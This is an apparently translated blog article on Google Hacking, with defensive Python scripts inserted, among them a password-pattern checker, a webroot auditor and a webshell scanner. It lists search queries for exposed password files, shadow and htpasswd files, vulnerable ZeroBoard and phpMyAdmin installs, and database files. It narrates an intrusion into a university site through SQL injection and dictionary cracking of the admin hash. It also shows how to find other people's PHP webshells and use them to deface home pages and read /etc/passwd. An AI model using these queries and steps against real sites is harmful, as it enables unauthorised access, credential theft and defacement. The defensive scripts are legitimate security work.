Google Hacking is not really new. When it first appeared, the technique was not taken seriously, and webshells and the like did not seem to have much practical use. But Google Hacking is not that simple…

## A simple implementation of Google Hacking

Using some of Google's search syntax gives us far more information (and certainly gives those who are used to attacking more of what they want). Here is a look at the common syntax.

intext:

Treats a string in the body content of a web page as the search criterion. For example, entering intext:web in Google returns all pages whose body contains "web".

allintext:

Used the same way as intext.

intitle:

Similar to intext above, but searches for the string in the title of the page. For example, intitle:security angel returns all pages containing "security angel" in the title. Likewise, allintitle works like intitle.

cache:

Searches Google's cached copy of the content; sometimes you will find something good there.

define:

Searches for the definition of a term. For example, define:hacker returns the definition of hacker.

filetype:

This is one of the ones I recommend most, whether for a network attack or for finding specific types of files, as we will discuss later. For example, entering filetype:doc returns all file URLs ending in doc. Of course, if you try .bak, .mdb or .inc, you may get more information.

info:

Finds some basic information about a specified site.

inurl:

Searches for the string we specify in the URL. For example, typing inurl:admin returns N links similar to www.xxx.com/xxx/admin. With…

link:

For example, searching link:www.4ngel.net returns all URLs that link to www.4ngel.net.

site:

This is also useful, for example site:www.4ngel.net, which returns all URLs under the 4ngel.net site.

Oh, and there are some other symbols that are also useful:

+ includes a word that Google would otherwise ignore in the search

- excludes a word

~ matches synonyms of a word

. single-character wildcard

* wildcard that can stand for several letters

"" exact-phrase query
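To make the operator semantics above concrete, here is a small parser, added here as an example and not part of the original article, that splits a query string into operator terms, quoted phrases and the +, - and ~ modifiers. The operator names are the ones listed above; anything else followed by a colon (a URL typed as a term, for instance) is kept as a plain term. The queries in the usage are constructed.

```python
import re
from dataclasses import dataclass, field

# The operators described above; any other "name:" prefix (e.g. "http://...") is a plain term.
OPERATORS = {"intext", "allintext", "intitle", "allintitle", "cache",
             "define", "filetype", "info", "inurl", "link", "site"}

# One token: optional +/-/~ modifier, optional operator prefix, then a quoted phrase or a bare word.
TOKEN = re.compile(r'''
    (?P<sign>[+\-~])?                       # + force inclusion, - exclude, ~ synonyms
    (?:(?P<op>[a-z]+):)?                    # operator prefix such as site:
    (?:"(?P<phrase>[^"]*)"|(?P<word>\S+))   # "exact phrase" or bare word (may hold . and * wildcards)
''', re.VERBOSE | re.IGNORECASE)


@dataclass
class ParsedQuery:
    operators: list = field(default_factory=list)  # (name, value) pairs, in query order
    required: list = field(default_factory=list)   # +word
    excluded: list = field(default_factory=list)   # -word or -operator:value
    synonyms: list = field(default_factory=list)   # ~word
    phrases: list = field(default_factory=list)    # "exact phrase"
    terms: list = field(default_factory=list)      # everything else


def parse_query(query):
    """Split a Google query into its operators, modifiers, phrases and plain terms."""
    result = ParsedQuery()
    for m in TOKEN.finditer(query):
        sign, op = m.group("sign"), m.group("op")
        is_phrase = m.group("phrase") is not None
        value = m.group("phrase") if is_phrase else m.group("word")
        if op and op.lower() not in OPERATORS:
            value, op = f"{op}:{value}", None   # not an operator: e.g. a URL typed as a term
        if op:
            if sign == "-":
                result.excluded.append(f"{op.lower()}:{value}")
            else:
                result.operators.append((op.lower(), value))
        elif sign == "+":
            result.required.append(value)
        elif sign == "-":
            result.excluded.append(value)
        elif sign == "~":
            result.synonyms.append(value)
        elif is_phrase:
            result.phrases.append(value)
        else:
            result.terms.append(value)
    return result


if __name__ == "__main__":
    # Constructed query combining the operators listed above.
    print(parse_query('intitle:"index of" .bash_history site:example.com -github +the ~tutorial'))
```

The parser deliberately treats `intitle:"index of"` as one operator with a phrase value, which is how the queries later on this page are built; a bare `-` or `+` with nothing after it falls through as a plain term.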

## Let’s start with the practical applications

Consider the following Google searches. For a malicious attacker, password files are probably the most interesting target, and because of its powerful search capabilities Google often discloses such sensitive information. Google the following:

```
intitle:"index of" etc
intitle:"index of" .sh_history
intitle:"index of" .bash_history
intitle:"index of" passwd lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
```

Sometimes important password files are left unprotected on the Internet for a variety of reasons, and if someone with ulterior motives obtains them the damage can be serious. Google can also be used to search for programs with known vulnerabilities. For example, a file source-code disclosure vulnerability was found in ZeroBoard some time ago; Google can find sites on the Internet that run this program:

```
intext:ZeroBoard filetype:php
```

Or use:

```
inurl:outlogin.php?_zb_path= site:.jp
```

to find the pages we want. phpMyAdmin is a powerful database administration tool; on some sites, because of a configuration error, phpMyAdmin can be operated without a password. We can use Google to search for URLs of installations with this weakness:

```
intitle:phpmyadmin intext:Create new database
```

Remember http://www.xxx.com/_vti_bin/..%5…ystem32/cmd.exe?dir? Google around and you will probably find a lot of vintage machines. We can also use this approach to find pages with other CGI bugs:

```
allinurl:winnt system32
```

We mentioned briefly above that you can use Google to search for database files; with some syntax you can search precisely for much more (Access databases, MSSQL, MySQL connection files, and so on). Here is an example:

```
allinurl:bbs data filetype:mdb
inurl:database filetype:inc conn
inurl:data filetype:mdb
```

```
intitle:"index of" data
```

This is often the case on some incorrectly configured Apache + Win32 servers. As above, we can also use Google to find admin back-ends.

Google alone is enough to collect information on a site and penetrate it. Let's use Google to test a specific site.

Start with Google and take a look at the basics of the site (some details are omitted):

```
site:xxxx.com
```

From the information returned, we find the domain names of several departments of the university:

```
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
```

By the way, they are on different servers. Schools usually have a lot of good data, so first let's see what good things there are.

```
site:xxxx.com filetype:doc
```

I get N good docs.

First, look for the site's admin back-end address:

```
site:xxxx.com intext:management
site:xxxx.com inurl:login
site:xxxx.com intitle:management
```

More than two admin back-end addresses:

```
a2.xxxx.com/sys/admin_l…
a3.xxxx.com:88/_admin/logi…
```

Not bad. Let's look at what is running on the servers:

```
filetype:asp site:a2.xxxx.com
filetype:php site:a2.xxxx.com
filetype:aspx site:a3.xxxx.com
filetype:asp site:...
```

The a2 server should be running IIS, with a site-wide ASP application and a PHP forum on top; the a3 server is also IIS, with ASPX + ASP. The web applications appear to be self-developed. Let's see if any public FTP accounts can be found:

```
site:a2.xxxx.com intext:ftp://*:*
```

I didn't find anything of value. Let's see if there are any upload vulnerabilities:

```
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
```

A file-upload page was found on a2:

```
http://a2.xxxx.com/sys/uploadfile.asp
```

I looked at it with IE, but I had no access. Let's try injection:

```
site:a2.xxxx.com filetype:asp
```

I got N ASP page addresses and let the software do the manual work. This program obviously did nothing to prevent injection. The permission was db_owner; not high, but enough. I didn't feel like getting a shell back, and the database seemed fairly large, so I just dumped the web administrator's password, which was MD5-hashed. School site passwords are generally regular, usually a variation on the domain name plus a telephone number, so Google can take care of it.

```
site:xxxx.com                    // get N secondary domain names
site:xxxx.com intext:*@xxxx.com  // get N email addresses, plus the names of the mailbox owners, etc.
```

Make a dictionary out of the information, leave it running and wait. After a while four accounts popped out: two for the student union, one for the administrator and one possibly for a teacher. Log in:

```
Name: website administrator
Pass: a2xxxx7619    // that is, the domain name + 4 digits
```
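The password pattern recovered above, the site's domain name followed by four digits, is the kind of thing a password policy can reject at creation time rather than leave for a dictionary built from Google results. The following check is an added example, not part of the original article; the domain, phone number and sample passwords it is called with are constructed, and the 12-character minimum is an assumed policy value.

```python
import re


def identity_tokens(domain, username=None):
    """Strings derived from public identity that must not appear in a password.

    For "a2.xxxx.com" this yields the labels of at least 3 characters ("xxxx") and
    the host name with dots removed and the TLD dropped ("a2xxxx"), the form seen above.
    """
    labels = [lab for lab in domain.lower().split(".") if lab]
    tokens = {lab for lab in labels[:-1] if len(lab) >= 3}
    tokens.add("".join(labels[:-1]))
    if username:
        tokens.add(username.lower())
    return {tok for tok in tokens if len(tok) >= 3}


def check_password(password, domain, username=None, phone=None, min_length=12):
    """Return the list of reasons a password is guessable; an empty list means it passed.

    min_length=12 is an assumed policy value, not something taken from the article.
    """
    reasons = []
    pw = password.lower()
    if len(password) < min_length:
        reasons.append(f"shorter than {min_length} characters")
    for tok in sorted(identity_tokens(domain, username)):
        if tok in pw:
            reasons.append(f"contains identity token '{tok}'")
    # Any run of 4+ digits that also occurs in a known phone number (the "telephone deformation" above).
    phone_digits = "".join(ch for ch in (phone or "") if ch.isdigit())
    for run in re.findall(r"\d{4,}", password):
        if phone_digits and run in phone_digits:
            reasons.append(f"digit run '{run}' appears in the phone number")
    # The exact shape recovered above: letters followed by a short numeric suffix.
    if re.search(r"[a-z]\d{4,}$", pw):
        reasons.append("letters followed by a numeric suffix (domain + digits pattern)")
    return reasons


if __name__ == "__main__":
    # Constructed values standing in for the redacted ones in the article.
    for candidate in ("a2xxxx7619", "correct horse 7619", "Tr0ub4dor&3xQ!"):
        verdict = check_password(candidate, "a2.xxxx.com", phone="+1 555 761 9000")
        print(candidate, "->", verdict or "ok")
```

The check is meant to sit next to a normal length and breach-list policy, not replace it: it only closes the specific shortcut of deriving a password from information that a `site:` or `intext:*@domain` search already hands an attacker.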

Over this period I have looked at some foreign research sites on Google hacking. In fact they are almost all flexible use of some basic syntax, or combined with a particular script vulnerability; it mainly depends on flexible thinking. Foreign sites do not do much to prevent Google hacking, so we just point it out; don't go and destroy things, ha ha. Network administrators running Apache on Windows should pay more attention to this: an intitle:index of brings almost everything out.
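The Apache misconfiguration the author keeps coming back to (directory listing enabled, database and include files left under the document root) can be checked from the server side before a search engine does it for you. The script below is an added example, not from the original article: it walks a document root and reports (a) files whose names or extensions match what the intitle:"index of" and filetype: queries quoted on this page look for, and (b) directories without an index file, which are exactly the ones Apache renders as "Index of /..." when Options Indexes is on. The sensitive-name lists and the sample document root it builds in a temporary directory are constructed for the example.

```python
import os
import tempfile
from pathlib import Path

# Names and extensions that the intitle:"index of" and filetype: queries quoted on
# this page hunt for. Constructed list for this example; extend it for your own site.
SENSITIVE_NAMES = {".sh_history", ".bash_history", "passwd", "pwd.db", "shadow",
                   "spwd", "htpasswd", ".htpasswd", "service.pwd"}
SENSITIVE_SUFFIXES = {".bak", ".mdb", ".inc", ".pwd"}
# Files a web server serves instead of a directory listing (assumed default set).
INDEX_FILES = {"index.html", "index.htm", "index.php", "index.asp", "index.aspx", "default.asp"}


def audit_webroot(root):
    """Walk a document root and return (exposed_files, listable_dirs), both sorted.

    exposed_files: paths whose file name or extension matches the sensitive sets.
    listable_dirs: directories with no index file; with Apache's `Options Indexes`
    enabled these render the "Index of /..." page that intitle:"index of" finds.
    Paths are relative to the root with forward slashes; "." is the root itself.
    """
    root = Path(root)
    exposed, listable = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root)
        if not any(name.lower() in INDEX_FILES for name in filenames):
            listable.append(rel_dir.as_posix())
        for name in filenames:
            lower = name.lower()
            # Path(".bash_history").suffix is "", so dotfiles are caught by the name set.
            if lower in SENSITIVE_NAMES or Path(lower).suffix in SENSITIVE_SUFFIXES:
                exposed.append((rel_dir / name).as_posix())
    return sorted(exposed), sorted(listable)


def build_sample_webroot(base):
    """Create a constructed document root mirroring the misconfigurations discussed above."""
    files = {
        "index.html": "<html></html>",
        "data/index.html": "",                              # has an index page: not listable
        "data/bbs.mdb": "",                                 # Access database under the web root
        "inc/conn.inc": "<?php $dsn = 'placeholder'; ?>",  # connection include file
        "backup/site.bak": "",                              # editor/backup copy
        "home/.bash_history": "",                           # shell history
    }
    for rel, content in files.items():
        path = Path(base) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content)


def run_demo():
    """Build the sample root in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webroot(tmp)
        return audit_webroot(tmp)


if __name__ == "__main__":
    exposed, listable = run_demo()
    print("exposed files:", exposed)
    print("listable directories:", listable)
```

On Apache the matching fixes are `Options -Indexes` in the `<Directory>` block for the document root, a `<FilesMatch "\.(inc|bak|mdb)$">` block containing `Require all denied` (2.4 syntax), and, better still, moving database and include files outside the document root altogether so that no filetype: query can reach them.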

1. Searching for and using PHP webshells

```
intitle:"php shell*" "Enable stderr" filetype:php
```

(Note: intitle searches the web page title; Enable stderr refers to UNIX standard output and standard error; filetype is the file type.) In the search results you can find many web shells that execute commands directly on the machine. If you find a PHP shell and don't know how to use it, and you're not familiar with UNIX, look at the LIST; I won't go into details here. Note that the foreign PHP shells we find here use UNIX commands, all of them run through calls to system() (in fact Baidu and other search engines can be used too, but the results differ). This PHP webshell can run echo (a common Unix command) directly. Overwriting the home page takes one line:

```
echo "summon" > index.jsp
```

Now look at the home page: we have changed it to "summon".

We can also use wget to upload a file (such as the page you want to put in place), then execute a command such as cat file > index.html or echo "" > file:

```
echo "test" >> file
```

Done line by line like this, the site's home page is replaced. The same thing works for:

```
uname -a; cat /etc/passwd
```

Note, however, that some webshell programs have problems and will not execute commands.
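From the defender's side, the shells described in this section share a recognisable shape: a command-execution function fed from request input, sometimes with a UI string such as the "Enable stderr" label used in the search query above. The scanner below is an added example, not from the original article; it walks PHP sources, follows simple variable assignments from $_GET/$_POST/$_REQUEST/$_COOKIE to calls of system(), exec(), shell_exec(), passthru(), popen() and proc_open(), and flags backtick execution and the marker string. The PHP snippets it scans are constructed samples, and the regex-level taint tracking is deliberately minimal (one variable per assignment line, same file only).

```python
import re
from pathlib import Path

# Functions through which the shells discussed above run their commands.
EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")
EXEC_CALL = re.compile(r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(([^;]*)", re.IGNORECASE)
# Request-controlled input.
REQUEST_SOURCE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
# "$var = <expr>" (not "=="), used to follow simple taint through assignments.
ASSIGNMENT = re.compile(r"(\$\w+)\s*=(?!=)\s*(.*)")
BACKTICKS = re.compile(r"`[^`]*\$\w+[^`]*`")
# UI string taken from the search query quoted at the top of this section.
MARKER = re.compile(r"Enable stderr", re.IGNORECASE)


def _mentions(text, variables):
    """True if any tracked variable name occurs in text as a whole token."""
    return any(re.search(re.escape(v) + r"\b", text) for v in variables)


def scan_php_source(src):
    """Return [(line_no, reason), ...] findings for one PHP source text."""
    findings = []
    tainted = set()  # variables assigned from request input, directly or via another tainted one
    for no, line in enumerate(src.splitlines(), start=1):
        assign = ASSIGNMENT.search(line)
        if assign and (REQUEST_SOURCE.search(assign.group(2)) or _mentions(assign.group(2), tainted)):
            tainted.add(assign.group(1))
        for call in EXEC_CALL.finditer(line):
            args = call.group(2)
            from_request = bool(REQUEST_SOURCE.search(args)) or _mentions(args, tainted)
            reason = call.group(1).lower() + "() " + (
                "with request-controlled argument" if from_request else "with constant/internal argument")
            findings.append((no, reason))
        if BACKTICKS.search(line):
            findings.append((no, "backtick execution of a variable"))
        if MARKER.search(line):
            findings.append((no, "webshell marker 'Enable stderr'"))
    return findings


def scan_tree(root):
    """Scan every .php file under root; return {relative_path: findings} for files with findings."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.php")):
        findings = scan_php_source(path.read_text(errors="replace"))
        if findings:
            report[path.relative_to(root).as_posix()] = findings
    return report


# Constructed samples used as scanner input; none of these is a real file from the article.
SAMPLE_SHELL = """<?php
// constructed sample in the shape of the scripts discussed above; scanner input only
$cmd = $_GET['cmd'];
$run = trim($cmd);
echo '<pre>';
system($run);
echo '</pre>';
echo '<label>Enable stderr</label>';
?>"""

SAMPLE_CONSTANT = """<?php
$out = shell_exec('uptime');
echo $out;
?>"""

SAMPLE_CLEAN = """<?php
$name = htmlspecialchars($_GET['name'] ?? '');
echo "Hello, $name";
?>"""


if __name__ == "__main__":
    for label, sample in (("shell", SAMPLE_SHELL), ("constant", SAMPLE_CONSTANT), ("clean", SAMPLE_CLEAN)):
        print(label, scan_php_source(sample))
```

A constant argument to shell_exec() is still reported, at lower severity, because a scanner cannot tell an administrative script from a shell by the call alone; the request-controlled case and the marker string are the findings that warrant pulling the file for review.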

2. Searching for sensitive information in INC files

Fill in the Google search box with:

```
.org filetype:inc
```